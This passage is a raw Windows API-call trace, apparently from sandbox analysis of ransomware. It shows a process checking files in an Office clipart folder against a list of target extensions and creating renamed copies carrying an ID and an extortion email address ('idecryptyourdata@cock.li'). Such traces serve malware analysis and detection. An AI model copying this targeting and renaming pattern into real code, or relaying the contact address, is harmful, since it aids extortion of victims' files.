(lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0159.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0159.626] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.626] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.626] CloseHandle (hObject=0x42c) returned 1 [0159.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0159.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0159.626] lstrlenW (lpString=".doc") returned 4 [0159.626] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.626] lstrlenW (lpString=".docx") returned 5 [0159.627] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0159.627] lstrlenW (lpString=".pdf") returned 4 [0159.627] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.627] lstrlenW (lpString=".xls") returned 4 [0159.627] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.627] lstrlenW (lpString=".xlsx") returned 5 [0159.627] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0159.627] lstrlenW (lpString=".ppt") returned 4 [0159.627] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0159.627] lstrlenW (lpString=".zip") returned 4 [0159.627] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0159.627] lstrlenW (lpString=".rar") returned 4 [0159.627] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0159.627] lstrlenW (lpString=".bz2") returned 4 [0159.627] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0159.627] lstrlenW (lpString=".7z") returned 3 [0159.627] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0159.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0159.627] lstrlenW (lpString=".dbf") returned 4 [0159.627] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0159.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0159.627] lstrlenW (lpString=".1cd") returned 4 [0159.627] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0159.627] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0159.627] lstrlenW (lpString=".jpg") returned 4 [0159.627] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0159.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0159.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0159.628] lstrlenW (lpString=".doc") returned 4 [0159.628] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.628] lstrlenW (lpString=".docx") returned 5 [0159.628] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0159.628] lstrlenW (lpString=".pdf") returned 4 [0159.628] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.628] lstrlenW (lpString=".xls") returned 4 [0159.628] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.628] lstrlenW (lpString=".xlsx") returned 5 [0159.628] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0159.628] lstrlenW (lpString=".ppt") returned 4 [0159.628] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0159.628] lstrlenW (lpString=".zip") returned 4 [0159.628] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0159.628] lstrlenW (lpString=".rar") returned 4 [0159.628] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0159.628] lstrlenW (lpString=".bz2") returned 4 [0159.628] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0159.628] lstrlenW (lpString=".7z") returned 3 [0159.628] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0159.628] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0159.628] lstrlenW (lpString=".dbf") returned 4 [0159.628] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0159.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0159.629] lstrlenW (lpString=".1cd") returned 4 [0159.629] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0159.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 68 [0159.629] lstrlenW (lpString=".jpg") returned 4 [0159.629] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0159.629] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0159.629] lstrlenW (lpString="J0107130.WMF") returned 12 [0159.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0159.630] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=27084) returned 1 [0159.630] CloseHandle (hObject=0x42c) returned 1 [0159.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf")) returned 0x220 [0159.630] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0159.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0159.631] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.631] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0159.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0159.631] CloseHandle (hObject=0x42c) returned 1 [0159.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF") returned 68 [0159.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF") returned 68 [0159.631] lstrlenW (lpString=".doc") returned 4 [0159.631] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0159.631] lstrlenW (lpString=".docx") returned 5 [0159.631] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0159.631] lstrlenW (lpString=".pdf") returned 4 [0159.631] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0159.631] lstrlenW (lpString=".xls") returned 4 [0159.631] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0159.631] lstrlenW (lpString=".xlsx") returned 5 [0159.632] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0159.632] lstrlenW (lpString=".ppt") returned 4 [0159.632] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0159.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF") returned 68 [0159.632] lstrlenW (lpString=".zip") returned 4 [0160.085] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0160.085] lstrlenW (lpString=".rar") returned 4 [0160.085] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0160.085] lstrlenW (lpString=".bz2") returned 4 [0160.085] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0160.085] lstrlenW (lpString=".7z") returned 3 [0160.085] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0160.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF") returned 68 [0161.753] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0161.753] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0161.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107138.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.598] CloseHandle (hObject=0x50c) returned 1 [0163.759] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.759] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0145168.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0145168.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.759] CloseHandle (hObject=0x51c) returned 1 [0163.763] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.763] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185798.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185798.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.763] CloseHandle (hObject=0x51c) returned 1 [0164.367] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.367] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185806.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185806.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.368] CloseHandle (hObject=0x4c8) returned 1 [0164.368] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.368] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187895.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.369] CloseHandle (hObject=0x4c8) returned 1 [0164.370] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.370] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187921.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187921.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.370] CloseHandle (hObject=0x4c8) returned 1 [0164.371] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.371] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.371] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188511.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188511.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.371] CloseHandle (hObject=0x4c8) returned 1 [0164.372] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.372] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188513.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188513.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.372] CloseHandle (hObject=0x4c8) returned 1 [0164.374] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.374] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.374] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188519.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188519.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.374] CloseHandle (hObject=0x4c8) returned 1 [0164.375] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.375] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188587.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188587.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.375] CloseHandle (hObject=0x4c8) returned 1 [0164.376] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.376] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188667.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188667.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.376] CloseHandle (hObject=0x4c8) returned 1 [0164.376] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.377] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188669.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188669.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.377] CloseHandle (hObject=0x4c8) returned 1 [0164.377] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.378] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0188679.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0188679.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.378] CloseHandle (hObject=0x4c8) returned 1 [0164.379] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.379] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195248.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195248.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.379] CloseHandle (hObject=0x4c8) returned 1 [0164.380] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.381] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195254.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195254.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.381] CloseHandle (hObject=0x4c8) returned 1 [0164.385] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.385] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195260.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195260.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.385] CloseHandle (hObject=0x4c8) returned 1 [0164.386] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.386] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195320.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195320.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.386] CloseHandle (hObject=0x4c8) returned 1 [0164.388] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.388] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195342.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195342.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.388] CloseHandle (hObject=0x4c8) returned 1 [0164.389] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.389] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195428.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195428.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.390] CloseHandle (hObject=0x4c8) returned 1 [0164.394] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.394] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0195772.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0195772.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.395] CloseHandle (hObject=0x4c8) 